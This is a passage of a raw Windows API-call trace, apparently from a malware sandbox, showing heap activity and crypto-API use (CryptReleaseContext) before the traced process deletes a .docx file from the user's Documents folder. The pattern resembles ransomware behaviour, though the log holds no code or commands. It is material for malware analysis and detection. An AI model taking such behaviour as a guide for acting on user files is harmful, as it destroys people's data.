[0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.811] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.812] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.812] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.818] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.818] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0263.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0263.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0263.820] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.821] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.823] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.823] FreeLibrary (hLibModule=0x756e0000) returned 1 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.823] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.823] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.823] CloseHandle (hObject=0x2a0) returned 1 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0263.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.825] CloseHandle (hObject=0x2d0) returned 1 [0263.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0263.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.844] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.845] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.845] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/hYiEt-0f.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\hYiEt-0f.docx", lpFilePart=0x8cedf4*="hYiEt-0f.docx") returned 0x27 [0263.845] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\hYiEt-0f.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hyiet-0f.docx")) returned 0x20 [0263.845] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\hYiEt-0f.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa804140, ftCreationTime.dwHighDateTime=0x1d5b490, ftLastAccessTime.dwLowDateTime=0x3513a170, ftLastAccessTime.dwHighDateTime=0x1d5b514, ftLastWriteTime.dwLowDateTime=0x3513a170, ftLastWriteTime.dwHighDateTime=0x1d5b514, nFileSizeHigh=0x0, nFileSizeLow=0x12b4b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="hYiEt-0f.docx", cAlternateFileName="HYIET-~1.DOC")) returned 0xa872d0 [0263.846] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\hYiEt-0f.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hyiet-0f.docx")) returned 1 [0263.853] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa804140, ftCreationTime.dwHighDateTime=0x1d5b490, ftLastAccessTime.dwLowDateTime=0x3513a170, ftLastAccessTime.dwHighDateTime=0x1d5b514, ftLastWriteTime.dwLowDateTime=0x3513a170, ftLastWriteTime.dwHighDateTime=0x1d5b514, nFileSizeHigh=0x0, nFileSizeLow=0x12b4b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="hYiEt-0f.docx", cAlternateFileName="HYIET-~1.DOC")) returned 0 [0263.853] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0263.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.854] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.854] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0263.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: 